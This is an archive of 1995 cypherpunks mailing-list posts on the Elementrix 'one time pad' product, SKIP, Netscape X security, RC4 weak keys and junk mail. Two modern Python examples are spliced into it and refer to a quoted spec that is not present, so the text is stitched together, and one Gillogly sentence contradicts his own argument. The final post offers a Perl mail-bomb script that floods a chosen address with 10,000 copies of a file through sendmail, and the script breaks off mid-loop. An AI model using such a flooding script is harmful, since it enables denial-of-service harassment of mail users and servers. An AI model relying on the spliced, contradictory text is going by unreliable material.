> It seems to be a OTP/stream cipher of some kind.. subsequent number depending
> on previous numbers. I don't know if its possible to prove that the sequence
> will never repeat, having not seen the algorithm. But if it did not, it would
> seem to be strong enough. Too many questions, too few answers.

It does seem to be a stream cipher of some kind. Subsequent numbers depending on previous numbers means that it's an autokey cipher. That most assuredly does make it a one time pad, no matter whether it ever repeats or not (which it presumably wouldn't).

Here's an easy way to demonstrate that the strength of this system is less than a one time pad. Let's give the attacker all the breaks: he knows the initial secret key, he has watched the key exchange from both sides by monitoring all keystrokes, and has access to all the keying information and plaintext and ciphertext that has happened from day 0 until now, day 30, but none of the plaintext or other keying information thereafter.

Case one: the system you're flogging. He can keep reading the mail.

Case two: a true one time pad. He immediately loses touch with the system as soon as they go to the first unknown byte of the one time pad.

I sympathize with their desire to call it a one time pad, since that has obvious marketing cachet. But it isn't -- can't they simply say they think it's a nice strong cipher?

Jim Gillogly
Sterday, 8 Winterfilth S.R.
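The DES padding rule and the RSA signature block layout that Stephan Somogyi quotes from the STT spec earlier on this page, carried out in code. This is an added example, not code from the STT spec or from any STT implementation: the function names are mine, hashlib.sha1 is assumed for the spec's "20-byte SHA hash", and the unpad and parse routines add the validation a careful receiver would perform, which the quoted text does not spell out.

```python
import hashlib

BLOCK = 8  # DES block size in bytes


def stt_des_pad(plaintext: bytes) -> bytes:
    """Pad as the quoted spec describes: x = 8 - (len mod 8) pad bytes, each
    holding the value x. A plaintext whose length is already a multiple of 8
    gets a full block of 0x08 bytes, so the padding is never ambiguous."""
    x = BLOCK - (len(plaintext) % BLOCK)  # always 1..8, never 0
    return plaintext + bytes([x]) * x


def padding_is_valid(padded: bytes) -> bool:
    """True only if the trailer is x copies of the byte x with 1 <= x <= 8
    and the total length is a non-empty multiple of the block size."""
    if not padded or len(padded) % BLOCK:
        return False
    x = padded[-1]
    return 1 <= x <= BLOCK and padded[-x:] == bytes([x]) * x


def stt_des_unpad(padded: bytes) -> bytes:
    """Strip the padding after decryption, refusing malformed input instead
    of silently returning a truncated or oversized message."""
    if not padding_is_valid(padded):
        raise ValueError("invalid STT/DES padding")
    return padded[:-padded[-1]]


def sha_20(data: bytes) -> bytes:
    """20-byte SHA hash. SHA-1 via hashlib is assumed here; the quoted spec says only 'SHA'."""
    return hashlib.sha1(data).digest()


# Fixed fields of the 128-byte signature plaintext, in the order the spec lists them
# after the hash: parser initializer, 105 padding bytes, 0x01, RSA overflow guard.
_SIG_TRAILER = b"\x00" + b"\xff" * 105 + b"\x01" + b"\x00"


def stt_signature_block(hash_of_data: bytes) -> bytes:
    """Lay out the RSA signature plaintext for a 1024-bit modulus:
    20-byte hash followed by the fixed trailer, 128 bytes in total."""
    if len(hash_of_data) != 20:
        raise ValueError("STT hashes are 20-byte SHA hashes")
    block = hash_of_data + _SIG_TRAILER
    assert len(block) == 128  # 20 + 1 + 105 + 1 + 1
    return block


def parse_stt_signature_block(block: bytes) -> bytes:
    """Inverse of stt_signature_block: check every fixed byte, not just the
    length, and return the embedded hash. A verifier that skipped the fixed
    fields would accept blocks the signer never produced."""
    if len(block) != 128:
        raise ValueError("signature block must be 128 bytes")
    if block[20:] != _SIG_TRAILER:
        raise ValueError("bad signature block formatting")
    return block[:20]


def stt_secret_key_bits() -> dict:
    """Secret key material implied by the quoted spec: RC4's 8-byte key less the
    3 salt bytes sent in the clear; DES's 8 bytes less one parity bit per byte."""
    return {"RC4": (8 - 3) * 8, "DES": 8 * 7}


if __name__ == "__main__":
    # The spec's own worked case: 17 bytes of plaintext get seven 0x07 bytes.
    padded = stt_des_pad(b"x" * 17)
    print(len(padded), padded[-7:].hex())
    print(stt_secret_key_bits())
```

Running the module shows the 17-byte case from the spec (24 bytes total, trailer `07070707070707`) and the 40/56-bit figures from the post's subject line.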
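Jim Gillogly's thought experiment above, run as code. This is an added example, not his code and not anything from Elementrix, whose method the press release says is disclosed only under NDA: a constructed toy autokey generator stands in for "subsequent numbers depending on previous numbers", with a true one-time pad beside it, and the attacker is given exactly the breaks the post lists (the initial secret and all traffic through day 30, nothing after).

```python
import hashlib
import os


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def toy_autokey_keystream(secret: bytes, history: bytes, n: int) -> bytes:
    """Constructed toy autokey generator: the keystream for the next message is a
    deterministic function of the shared secret and of every ciphertext byte sent
    so far. Anyone holding the same inputs computes the same keystream, which is
    exactly the property the legitimate receiver relies on."""
    out = bytearray()
    state = hashlib.sha256(secret + history).digest()
    while len(out) < n:
        out.extend(state)
        state = hashlib.sha256(state).digest()
    return bytes(out[:n])


class AutokeyChannel:
    """Case one: keys 'as long as the message, used once', but derived from
    earlier traffic rather than drawn fresh."""

    def __init__(self, secret: bytes):
        self.secret = secret
        self.history = b""

    def encrypt(self, plaintext: bytes) -> bytes:
        ks = toy_autokey_keystream(self.secret, self.history, len(plaintext))
        ct = xor_bytes(plaintext, ks)
        self.history += ct
        return ct


class OneTimePadChannel:
    """Case two: a real one-time pad. Each message gets a fresh pad of independent
    random bytes (shared out of band), never derived from anything earlier."""

    def __init__(self):
        self.pads = []

    def encrypt(self, plaintext: bytes) -> bytes:
        pad = os.urandom(len(plaintext))
        self.pads.append(pad)
        return xor_bytes(plaintext, pad)


def attacker_derives_next(secret: bytes, seen: bytes, target_ct: bytes) -> bytes:
    """The attacker of the post: knows the initial secret and everything exchanged
    through day 30, nothing after. He runs the same derivation the receiver would."""
    ks = toy_autokey_keystream(secret, seen, len(target_ct))
    return xor_bytes(target_ct, ks)


def gillogly_experiment(messages):
    """Return (autokey_readable, otp_readable): whether the attacker recovers the
    last message, the first one sent after his knowledge ends."""
    secret = b"initial secret, watched over both shoulders on day 0"  # constructed
    auto, otp = AutokeyChannel(secret), OneTimePadChannel()
    auto_cts = [auto.encrypt(m) for m in messages]
    otp_cts = [otp.encrypt(m) for m in messages]
    target = messages[-1]
    # Case one: the new keystream is a function of material he already holds,
    # so he keeps reading the mail.
    auto_guess = attacker_derives_next(secret, b"".join(auto_cts[:-1]), auto_cts[-1])
    # Case two: he even holds every earlier pad byte, but the new pad is
    # independent of all of it; anything derived from the past is a blind guess.
    otp_guess = attacker_derives_next(secret, b"".join(otp.pads[:-1]), otp_cts[-1])
    return auto_guess == target, otp_guess == target


if __name__ == "__main__":
    days = [b"day %02d: the usual report from the field" % i for i in range(31)]
    print(gillogly_experiment(days))  # (True, False)
```

The second value is False with overwhelming probability for a message of this length (a spurious match would need the hash-derived guess to equal 40 bytes of fresh randomness). The point is the first value: once keystream is a function of state an observer could hold, the system is a stream cipher whose security rests on that state staying secret, which is a different claim from "one-time pad".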
1995, 22:21 From nobody at REPLAY.COM Fri Sep 29 15:40:21 1995 From: nobody at REPLAY.COM (Anonymous) Date: Fri, 29 Sep 95 15:40:21 PDT Subject: Call for IT Sec XX Message-ID: <199509292240.XAA16987@utopia.hacktic.nl> From: Call for White Papers Information Technology Security Policy Setting Process issued by the Cross-Industry Working Team Thursday, September 28, 1995 Introduction The Cross-Industry Working Team (XIWT) is seeking inputs from U.S. industry on ways to improve the process by which public policy on information technology systems security is developed. At the invitation of the Information Infrastructure Task Force (IITF) of the U.S. government, XIWT is soliciting ideas broadly from US industry, in the form of White Papers that address this issue. XIWT will, later this year, convene a workshop of industry experts to organize the ideas and suggestions expressed in these White Papers into a report for use by the IITF, and will prepare a report to be made available to the public. XIWT is a multi-industry coalition of organizations committed to defining the architecture and key technical requirements for a powerful and sustainable national information infrastructure (NII). XIWT aims to foster the understanding, development and application of technologies that cross industry boundaries; facilitate the conversion of the NII vision into real-world implementations, and facilitate a dialogue among representatives of stakeholders in the private and public sector. Additional information about XIWT can be found on the Internet at: http://www.xiwt.org/homepage. Information Technology Systems Security In the developing National Information Infrastructure (NII), information technology will be deployed in a wide range of contexts and systems including communications, computing, software systems, and many different types of applications. 
The ability of this technology, and the systems which employ it, to provide the requisite levels of security and protection, are of concern to almost everyone. Issues of central concern include: physical protection of systems and their contents, potential vulnerabilities at various points within the networked environments of these systems, and the ability to provide or even guarantee reliable and/or uninterruptable service. The infrastructure for such capabilities will need to include mechanisms for the protection of networks, computers and other types of equipment as well as systems that employ these elements, as well as methods for analysis, certification and validation of technology and systems, and for facilitating the setting of standards. It is likely that cryptographic capabilities will need to be available throughout for possible use in protection and authentication of information. Issues involving the management of these capabilities will need to be uncovered, discussed and resolved where possible. At present, the federal government has no formal process in place, in the Congress or in Executive Branch agencies, which adequately involves the private sector in the determination of public policy in this area. Responsibilities for this broad area within the federal government are widely diffused and do not necessarily insure that all the relevant concerns of the private sector are taken into account. Further, no single process is used by the various parts of the federal government and a variety of policies, reflected in laws, regulation and practice, usually result. A methodology is required by which private sector interests can be adequately expressed and factored into resulting policies. 
The purpose of this call for white papers is to request written inputs from interested and knowledgable parties on how the formal process to developing information technology systems security policies may be improved, and particularly on how private sector inputs can be most effectively incorporated. Specifically, industry is requested to identify those areas, domains, and issues that are especially relevant for consideration, and to recommend specific suggestions or approaches by which the policy determination process in these areas may be improved. This may entail, for example, the establishment of one or more bodies dedicated to this purpose, within or across domains; the creation of a broad set of principles for the government or other bodies to employ; the setting of national goals or other specific recommendations for federal action. Submissions White papers are specifically solicited from U.S. industry; other individuals who wish to contribute are welcome to do so. Submissions may be made on paper or electronically by sending electronic mail, document files, or via a form located on the XIWT World Wide Web server (addresses below). Submissions made on behalf of companies will be taken to represent the views of the firm; these will be verified if it is not made clear in the submission that the document represents a company position. Individual submissions will not be verified if they do not claim to represent company positions. Submissions should be: 1) responsive to the primary goal of this call, (focused specifically on process improvement and not the presentation of view on policy deficiencies or on desired policies); 2) clear in terms of specific topics, areas or domains of policy; 3) reasonably direct, brief and timely. Any format may be used for the white paper, and it may be of any length. However, submissions must include the following information, on envelopes or headers to email and web messages, and on the submission document, whatever its form: 1. 
The name of individual making the submission; 2. The name of firm on whose behalf the submission is made; 3. The return address by which submission may be verified, if necessary. XIWT will convene a one or two day invitational workshop in the Washington DC area in December, 1995, to review submissions and organize the preparation of findings. Papers received by November 15, 1995, will be used in the workshop. The report of this effort is intended to be made available in February, 1996. Submissions must be made to one of the following addresses: Conventional Mail: Security Policy Process XIWT 1895 Preston White Drive Suite 100 Reston VA 22091-0913 Electronic Mail: secpros at cnri.reston.va.us Please place: "Security Policy Process" in the "Subject:" field. Please use ASCII text in any attachments. World Wide Web: suggestions may be contributed via the internet at: http://www.xiwt.org/response The content of submissions will be used by XIWT only for the purposes described in this call. No specific attribution to individual companies or individuals will be made in the findings or report. We look forward to your help in this important national effort. For additional information, please contact Charles Brownstein or Pam Memmott Tel: (703) 620-8990 Internet: cbrownst at cnri.reston.va.us Internet: pmemmott at cnri.reston.va.us 9/22/95; PJM From Doug.Hughes at Eng.Auburn.EDU Fri Sep 29 15:42:08 1995 From: Doug.Hughes at Eng.Auburn.EDU (Doug Hughes) Date: Fri, 29 Sep 95 15:42:08 PDT Subject: SKIp Message-ID: <199509292241.RAA24918@dns.eng.auburn.edu> anybody have any opinions on SKIP (Sun's IP level encryption). How does it compare for encrypting between machines to something like ssh? 
(Obviously ssh is more portable, other than that) Doug From dvw at hamachi.epr.com Fri Sep 29 15:59:38 1995 From: dvw at hamachi.epr.com (David Van Wie) Date: Fri, 29 Sep 95 15:59:38 PDT Subject: Elementrix Press Release Message-ID: <306C7A37@hamachi> ELEMENTRIX ANNOUNCES REVOLUTIONARY ENCRYPTION FOR INTERNET AND ALL DIGITAL COMMUNICATION ANNOUNCED AT NETWORLD + INTEROP POTP Secure Mail, Secure FTP Avoid Limitations of Existing Systems NEW YORK, Sept. 29 /PRNewswire/ -- Elementrix Technologies, Inc. has announced a security technology for digital communications based on the only encryption method which is considered unbreakable. The method, POTP (Power One Time Pad) eliminates the weaknesses that allow break-ins to existing systems. Two products which feature this technology, POTP Secure Mail and POTP Secure FTP were voted the leading security products in the Best of the Show awards announced at the Networld + Interop Show in Atlanta this week. The technology is expected to be a boon to both corporate and individual users of the Internet and a major step forward for electronic commerce. The products are an automatic implementation of One Time Pad (OTP), the only encryption which is considered unbreakable. Prior to the invention of POTP, OTP was used only in extreme situations where cost and logistical constraints were not determining factors. Now POTP(TM) makes this legendary encryption readily available as a commercial software package. As with OTP, POTP creates keys that are as long as the messages they encrypt, and are used only once. But unlike OTP, which requires extensive key distribution and management, POTP(TM) creates real time: random keys are created automatically during the communication process. Therefore, users can instantly send private and sensitive e-mail over the Internet or other open systems with 'point and click security.' 
"Elementrix has found a logical way to generate non-algorithmic, dynamically changing keys at two separate sites without transmitting them on the line and without using parallel lines," said Dr. David Kahn, the country's leading historian of cryptography and the current visiting historian at the National Security Agency. "Elementrix is well within its rights to call this technology Power One Time Pad. I see no way of reconstructing the encryption key," he said at the press conference announcing the products. "POTP represents a paradigm shift in encryption," said Winn Schwartau, an internationally recognized expert on electronic security who also spoke at the press conference. "The fundamental technology is entirely different from any existing encryption scheme. This is the first system I've ever seen that can make the entire Internet secure for non-expert users." Schwartau also noted the importance of the system for corporate users based on its advantages in the area of key management. "The problem with systems that depend on passwords for security is that the infrastructure required to manage and distribute them is cumbersome, especially in large organizations," he said. "POTP eliminates the need for this infrastructure." POTP(TM) technology can be used to encrypt any digital communication. This can include data communications, secure telephones, wireless, satellite, cable TV and virtually any method of modern, digital communications. All POTP(TM) products are automatic and transparent to the user. The system addresses a paradox in encryption: "If the keys are truly unpredictable then there should be no way for one party to automatically re-create the same keys that are being used by the other," said Isaac Rubinstein, executive vice president of Elementrix Technologies Inc. "However, POTP's dynamically changing random keys are created by a patent pending method during the communication process itself," he said. 
"After the POTP(TM) between the two parties has been initialized -- only the very first time they communicate -- a One Time Pad process is executed continuously." POTP(TM) is patent pending. This unique method is fully disclosed on an individual basis only, through a non-disclosure agreement. A select group of encryption and security experts, including Kahn and Schwartau, have been fully briefed and have endorsed the new technology. POTP(TM) Secure Mail carries a very low overhead of less than 1.2%. Encryption and decryption are very fast and have virtually no effect on software performance. The system requires an IBM or compatible computer with a 386 or higher CPU and 4MB of RAM; a modem or network card; and any TCP/IP stack for Microsoft Windows. The software is Windows 3.1 and Windows 95 compatible. Professsional Encryption/Personal Privacy In the e-mail package, the entire message including attachments is encrypted in real time as it leaves the PC. Messages remain totally private while stored on the mail server, handled by an Internet provider, and/or sent over communication lines. Messages are sent in standard e-mail format with no need for a special mail server. Any standard SMTP/POP3 mail server will handle the messages. There is no need for any manual key distribution or management: no public and private keys; no master and session keys. Messages remain private and cannot be read by anyone, even system administrators. The manufacturer's suggested list price for the single user is $245. A special price of $198 will be available during the product introduction. Elementrix Technologies Elementrix Technologies Inc., based in New York City, is a subsidiary of Elementrix Technologies Ltd., based in Haifa, Israel. The parent company is a subsidiary of Elron Electronic Industries Ltd., Israel's leading advanced technology holding company. 
Elementrix was founded in January 1994 in order to develop commercial applications for its POTP(TM) encryption and other security products. CONTACT: Michael Meric, Fusion TMA, 212-977-4600, fax: 212-265-9684, e-mail: mmeric at elementrix.co.il, or Maia Aron, VP Marketing, Elementrix, 212-888-8879, fax: 212-935-3882, e-mail: maia at elementrix.co.il From warlord at MIT.EDU Fri Sep 29 16:22:52 1995 From: warlord at MIT.EDU (Derek Atkins) Date: Fri, 29 Sep 95 16:22:52 PDT Subject: SKIp In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu> Message-ID: <199509292322.TAA09464@toxicwaste.media.mit.edu> > anybody have any opinions on SKIP (Sun's IP level encryption). > How does it compare for encrypting between machines to something like > ssh? (Obviously ssh is more portable, other than that) SKIP and ssh perform very different operations. SKIP is an IP-level encryption engine (ala IP-SEC), whereas ssh is an application-level encryption engine. You can run ssh on top of SKIP. And using SKIP I can encrypt every single IP packet leaving my machine; you can't do that with ssh. Does this help? -derek From jwz at netscape.com Fri Sep 29 16:26:29 1995 From: jwz at netscape.com (Jamie Zawinski) Date: Fri, 29 Sep 95 16:26:29 PDT Subject: Netscape hole without .Xauthority (fwd) In-Reply-To: Message-ID: <306C804A.3CE1CFB@netscape.com> Jyri Kaljundi wrote: > > There's a huge hole in the Netscape remote control mechanism for the > X-Windows based clients. > Potential impact : anybody can become any user that uses Netscape on any > system without sufficient X security. Did you bother to read the spec? This doesn't matter; if I can connect to your X server at all, you have already lost. The spec (at http://home.netscape.com/newsref/std/x-remote.html) contains: SECURITY CONCERNS Any client which can connect to your X server can control a Netscape Navigator process running there; authenticating the originator of the request is beyond the scope of this protocol. 
It is assumed that the underlying X security mechanisms will prevent unauthorized people from accessing your server. It is important (in general) that everyone be aware of the security risks associated with allowing unlimited access to your X server. Regardless of whether you use Netscape Navigator, allowing arbitrary users and hosts access to your X server is a gaping security hole. If hostile forces an connect to your server, it is trivially easy for them to execute arbitrary shell commands as you, read and write any of your files, and watch every character you type. Again, this has nothing to do with Netscape Navigator. It is a property of the X Window System. If you have turned off security on your X server with the xhost + command, or if you have announced that a host is ``trusted'' by using xhost or by listing that host in your /etc/X0.hosts file, then you should be aware of the consequences. If this causes access to be possible from a host which is not, in fact, trusted, then you have left your doors wide open. For more information about the security mechanisms one can use with an X server, consult the manual pages for X(1), Xsecurity(1), xauth(1), and xhost(1), or talk to your system administrator. -- Jamie Zawinski jwz at netscape.com http://www.netscape.com/people/jwz/ ``A signature isn't a return address, it is the ASCII equivalent of a black velvet clown painting; it's a rectangle of carets surrounding a quote from a literary giant of weeniedom like Heinlein or Dr. Who.'' -- Chris Maeda From vznuri at netcom.com Fri Sep 29 16:27:27 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Fri, 29 Sep 95 16:27:27 PDT Subject: Web "places" and the media monsters Message-ID: <199509292319.QAA21372@netcom10.netcom.com> below is an interesting excerpt from Boardwatch magazine, which I find to be a good source for internet/web/BBS coverage. 
it talks about how the Web, to continue its momentum, may evolve into something like BBSes that give the sense of an online community.. also, I recently read a chapter from an upcoming book, I think it was by Negroponte, and he pointed out how the web/gopher servers did not really explode until the introduction of Mosaic and an *image* standard was put into HTML. (to this I would add forms capability-- buttons, etc.) This suggests that the success of the Web is really highly predicated on the easy-to-use interface of Web browsers, and the nice visual presentation given by images etc. in other words, the "hypertext" capabilities, while tremendous, were not necessarily the *key* factors in driving its use, but when coupled with these other ingredients, really pushed it all "over the top". this makes a lot of sense to me. the human being is very visually oriented (large amounts of brain capacity are dedicated to processing images). I think the days of computer programs as "lines of text scrolling up the screen" are increasingly numbered because of this. the easy-to-use GUI will be the model of most future software for a long time. in addition to this, I would add that I suspect that as soon as web pages begin to convey a sense of community (as mentioned in this column), through conferences etc., the growth of the web will increase even more dramatically.. I also continue to believe that "groupware" will prove to be a very important aspect of future web development.. (so I agree with TCM that isolated software packages that do not really integrate with the web to do groupware are going to eventually go extinct). 
the thoughts in this column also tie in with the recent NYT Levy column in which Levy pointed out how the internet is an entirely new medium for broadcasting in which the individual has total freedom and egalitarianism that cannot be found in any other medium of the past, and that for this reason all the recent frenzied, slobbering media mergers are actually "rearranging the deck chairs on the titanic" (he credits J.Gilmore for this quote, who seems to have an amazing propensity for great soundbites). I agree with this wholeheartedly.

the big media conglomerates are going to be quite terrified when they eventually realize that the main thing they are providing is a *distribution channel*, and that these very costly distribution channels are all obsoleted (sorry to verb that word) by the introduction of cyberspace for the masses. artists are free to try to reach the audience in whatever means they see fit; they are no longer dependent on the media machines to make a living. I have talked to various musicians for example who find that they can create their own CDs through individually contracting with various companies and make far more in profit than they can from going with record companies (who shave off enormous amounts of artist profit to feed the machine). there's an amusing pink floyd song with a biting satire of a record company executive:

"the band is just fantastic!! that's really what I think!! oh by the way, which one's pink?? oh, have you seen the charts?? everyone else is just green!! this could be made into a monster if we all pull together as a TEAM!!"

now, I don't believe this means the end of various artistic people and occupations such as producers, directors, etc. however the artist/writer/whatever suddenly becomes the driving component, the centerpiece, of the entire process. he has the ability to very discriminately decide who he wishes to work "with" (not for!) and who will benefit from his own work and in what way.
he is no longer a cog in the machine but in fact the director and driving force of it all. he has the ability to cut out the parasitical middleman like never before (I do think there are many truly *beneficial* middlemen out there to help the artist flourish, and the future will help separate the wheat from the chaff). there are some things that very big companies give you, and one of them is a very big budget. but if this is the only purpose of a big company, then it can almost be seen just as a big investment firm or capital generating machine. this machine will probably continue to exist but will be in an increasingly subservient role to how artists wish to interact with it, IMHO. this can already be seen in how top actors and directors are now setting their own terms like never before.

amazingly, as TCM noted in a recent post, industry pundits at one point were actually saying that "hypertext is dead" a few years ago, because no new developments had been made in it and the Ted Nelson Xanadoodoo silliness had never gotten anywhere (despite major bucks thrown at him-- one almost wonders if he set back hypertext, rather than advanced it, but that's another story). this is the amazing lack of vision that most people have about the future, about what consumers are really interested in, and you can see it again noted by Rickard below. at one point huge bucks were being thrown down prototype projects to deliver news through the vertical-blank interval of the television screen, and newspapers thought this would be the "information delivery vehicle of the future". the service flopped. the lesson was not that "hypertext is dead" or "online services are not profitable" (some of the actual conclusions of industry analysts) but that this was not the exact form that the public was interested in.

there is a difference that I have emphasized elsewhere about "interactive" vs. "interconnective".
the former would refer to a human interacting with computer, like a CD rom game, or hypertext, or whatever. the latter refers to humans interacting with other humans through cyberspace, more directly, more viscerally: email, chat forums, communities, multiplayer games, etc. the latter is the ingredient that is really driving the hyper cyberspatial renaissance, IMHO, and Rickard brings out this point below. (the neat thing about home pages is not so much that they are pretty and visually appealing, but that they are written by your friend Joe Schmoe next door, and highly personalized, quirky and eccentric.)

for some of my own investment tips, if you want to invest in companies that understand where the future is going, invest in the ones that understand:

1. anyone should be able to publish on the network. no one (not government, not media company, not internet provider, etc.) is authorized to control others through allowing or denying access, charging exorbitant taxes, charging exorbitant overhead, etc. this is not merely a statement of what is desirable, or my own wishful thinking, it's a basic future reality that is already largely formed at this moment. those who don't like it and fight it will simply fail to be competitive and survive over the long run.

2. the content-providers will not have to pay much for the infrastructure to provide their wares. in the past distribution and content could not be separated, and those in control of the former could control the latter. the two have been *cleaved* in the present and the future. the distribution costs for "media" are going to become almost completely negligible in the future. the distribution channels will involve cutthroat competition, and enormous bandwidth for virtually free.

2.5 companies that understand this "cleaving" will prosper. companies that are trying to combine content and delivery don't "get it" and will probably split or die.

3. humans want to "interconnect" with other humans.
pretty pages and all that other stuff is great, but it doesn't create the insatiable enthusiasm for being online that "interconnection" does. the future "killer apps" will be increasingly "interconnective, not interactive".

4. increasingly, quality and true artistry will flourish. you will not be able to make a quick buck from crappy material. the public will be able to be very selective. they might be able to buy individual songs from songwriters, individual essays from writers, etc. (through clicking on various web pages).

5. middlemen will become increasingly accountable for what kind of value they are adding to the final product. they will not become obsolete, but will have to justify their cut. the artist will no longer have to sell their soul just to get a record or writing in front of the public. the artist will write their own ticket and set their own standards. the exploitative aspects of the current media machine (which are quite reprehensible and widespread, from what I can tell) are going to be replaced with a "kinder, gentler" approach..

6. the days of a zillion people watching the same program or listening to the same music are dead. this is much lamented by the media monsters, because this was a big aspect driving their existence. this is not so much a "fragmentation of markets" but actually a "blossoming of individuality". the net will continue to fragment artistic tastes. but individuals will have little problem fulfilling their own tastes.

7. the paradox of all this is that when people are more free to pursue that which interests them in particular, and they are not "homogenized out of existence", the overall organism flourishes. there is nothing to lament in the fact that a thousand people now do not listen to the same music or read the same newspaper or whatever-- this is something to celebrate. it scares people like politicians, who derive much of their power from "homogenization"..
but thankfully this is another case where I think the future will separate the healthy from the lame, presuming there is indeed a distinction in this case.

as you can see, a lot of these points, which may seem pretty obvious to a lot of people here, are fundamentally not understood by today's preening media magnates (which, perhaps, are the entities that *will* become extinct). but it's just fine to let them go on their merry way, you know what they say about fools and money. I don't really have any idea, really, where the massive media mergers are going to go. I certainly am not saying they are going to disappear overnight. one possibility, as I mentioned, is that they would tend to become just huge, competing capital providers. they might turn into sort of "artistic communities", each with a different flavor. if they are going to die, though, the eclipse will certainly be messy as these big monsters go down kicking and screaming, realizing that the delicious lunch they were salivating after was actually sinking in a tar pit.

Boardwatch Webwatch column by editor Jack Rickard

The World Wide Web has deservedly captured the imagination of the online world. It displays both extraordinary connectivity, in that you can literally hop across continents by clicking the mouse, and a very visually appealing graphical interface. And it probably goes beyond that with the use of audio, videoclips, and more. But it is destined to die in its current form.

Through the entire history of the online community, there has been an urge to create pretty screens, have them blessed by lawyers, and presented online for the consumption of the masses, who in theory will each pay a little bit of coin of the realm for the privilege. Literally hundreds of millions of dollars drained into this rathole fantasy before those who created online services began observing what people *wanted* to do online. Visually appealing screens are always a novelty.
But after the novelty wears off, the callers move on. Knight-Ridder provided the most grisly example of this with their failed VIEWTRON service. But they weren't alone.

Currently the World Wide Web is in a nearly pure fad phase entirely based on novelty. Almost every site you visit has something new and stunning to offer by way of screen design tricks. But after clicking through the thousands of sites available for a few weeks, almost everyone tires of the game and starts looking for a home. Since most of what the web can do is present information via eye-candy screens, they rarely find one. So they are back to newsgroups and e-mail to keep them occupied.

This is not entirely apparent today. The flood of new callers just gaining access is immense. And according to an NTIA study just released, by the end of 1995, nearly half of the population online will have just arrived in 1995. But at some point, webulosis, a hardening of the web, could set in. We don't actually think it will happen. There is enough in the combination of novelty and new blood to keep this in the air for some months. And that may be all that is needed.

But for the web to grow beyond pretty screens, bulletin boards or something very like bulletin boards must migrate to the Web and make it truly useful. In other words, web sites must evolve into "places" where there are "people" if they are to continue to be relevant beyond specialty publishing. So our theory is that the Web is going to change into a series of bulletin boards. And bulletin boards, conversely, are going to migrate to the web with all the caller management, local message conferences, and sense of "place" that entails.

...
[the article goes on to mention the Whole Earth 'Lectronic Link as a living embodiment of this trend, see http://www.well.com]

--Vlad Nuri

From cman at communities.com Fri Sep 29 16:46:37 1995
From: cman at communities.com (Douglas Barnes)
Date: Fri, 29 Sep 95 16:46:37 PDT
Subject: Crypto hardware (was: Using sound cards to accelerate RSA?)
Message-ID:

>The reason the market for this is weird is the same reason Sun took
>the DES chips off its motherboards years ago -- you can't conduct
>modern business with the fucked up export regime we are dealing with.
>

Also, even if national boundaries could be transcended (it's not just the US any more on this score), I'll grant to Tim that server-oriented cryptography h/w isn't going to be a mass-market item. It's going to be a niche market, but it's an _absolutely vital_ niche market if this stuff is going to take off in a big way. I, too, wouldn't invest big bucks in a company that did nothing but server-oriented crypto h/w, but I know that a lot of very good business ideas _won't work at all_ if this stuff doesn't exist.

At the same time, there is going to be a very good business in consumer-oriented crypto devices as the problems inherent in using a general purpose computer for storing & processing keys, e-cash, etc. become apparent. I'm leaning away from the less specialized stuff, e.g. "checkbook on a PCMCIA card" and toward general purpose cards like the nat. semi. and telequip stuff. Both of these companies are rumored to be offering server-oriented products in the next couple of quarters to complement their consumer product lines.

The problem with general purpose machines has nothing to do with native processing vs. DSPs, but rather the fact that g.p. machines have mechanical hard drives and don't fit in your pocket. They also tend to house a lot of dubious other software that could get its grubby hands on things.
These issues of reliability, portability and security don't affect things like soundcards, which is why native signal processing is likely to win there, but not in the use of crypto to secure valuable transactions.

From yusuf921 at uidaho.edu Fri Sep 29 16:55:06 1995
From: yusuf921 at uidaho.edu (Syed Yusuf)
Date: Fri, 29 Sep 95 16:55:06 PDT
Subject: Electronic junk mail
In-Reply-To: <199509292241.RAA24918@dns.eng.auburn.edu>
Message-ID:

I just received an electronic junkmail! not only that but it was racist (and/or republican) in content.

: > > Syed Yusuf wrote...
> >> how did this get into my mailbox and is there anything I can do to
> >>keep stuff like this out?
>
> apparently someone sent this message to a lot of people -- others have
> reported getting it too.
>
> there is _nothing_ you can do to keep unwanted mail out of your mailbox,
  ^^^^^^^^^!!!!

Nothing? NOTHING??????

Cypher punks to the rescue? my privacy has been violated anyone got any ideas besides just putting each individual into my kill file?

--
Syed Yusuf | http://www.uidaho.edu/~yusuf921
Keep me away from Wisdom that does not Cry, Philosophy that does not Laugh, and Greatness that does not bow before Children --Kalil Gibran

From baldwin at RSA.COM Fri Sep 29 18:19:08 1995
From: baldwin at RSA.COM (baldwin (Robert W. Baldwin))
Date: Fri, 29 Sep 95 18:19:08 PDT
Subject: RSA's comments on RC4 weak keys
Message-ID: <9508298124.AA812423895@snail.rsa.com>

Well, I seem to be falling into the role of spokesperson for RSA on the net. It gives me something to do other than design reviews and programming. Here is our response to the excellent work that Andrew Roos has been doing on RC4. I am glad that people are looking at RC4 critically.

--Bob

-----------------------------
September 29, 1995 statement from RSADSI

RSA Data Security Inc. has been following the emerging reports of a weakness in certain keys for the RC4 cipher.
RSADSI's researchers have been aware of this particular property of the RC4 cipher for over a year. Most ciphers have a property whereby an enormous amount of known plaintext will provide a slight reduction in exhaustive key searching. The linear cryptanalysis of the DES cipher is a well-known example of this. Limitations like this in the underlying ciphers are addressed by following sound advice on the design of the overall cryptographic system. Products that include RC4 from RSADSI are not compromised by this attack. Companies that license the BSafe cryptography toolkit have always been given advice that overcomes this limitation of the RC4 cipher, and this is true even for products that were built >before< this specific problem was discovered by the researchers at RSADSI. These researchers also monitor all developments in the field of cryptography and cryptanalysis so they can keep RSADSI's customers apprised of relevant developments.

From remailer at bi-node.zerberus.de Fri Sep 29 18:34:21 1995
From: remailer at bi-node.zerberus.de (Ford Prefect)
Date: Fri, 29 Sep 95 18:34:21 PDT
Subject: Electronic junk mail (one solution)
Message-ID:

OK...I know this borders on a "denial of service" attack since it may affect innocent users. How would you like to be the one to explain to your System Administrator that the Megabytes of returned Spam on the disk are yours? I realize that some people's implementations of Sendmail will tell who you are regardless, so you might have to modify the "system" line for your own tastes. Also you might *not* want to be anon. Please feel free to modify to your own tastes. The delay loop is to space out the load. I also tried it with premail instead of Sendmail and it went through the remailers just fine. It should be capable of running in the background. Only took 5 minutes to write and a couple of remailers to test.
============================================================
#!/usr/bin/perl
print "Who does this go to?: ";
chop($name = <STDIN>);
print "What is the filename to send?: ";
chop($filename = <STDIN>);
for ($a=0;$a<100;$a++) {
    for ($b=0;$b<100;$b++) {
        system ("/usr/lib/sendmail -f nobody $name < $filename");
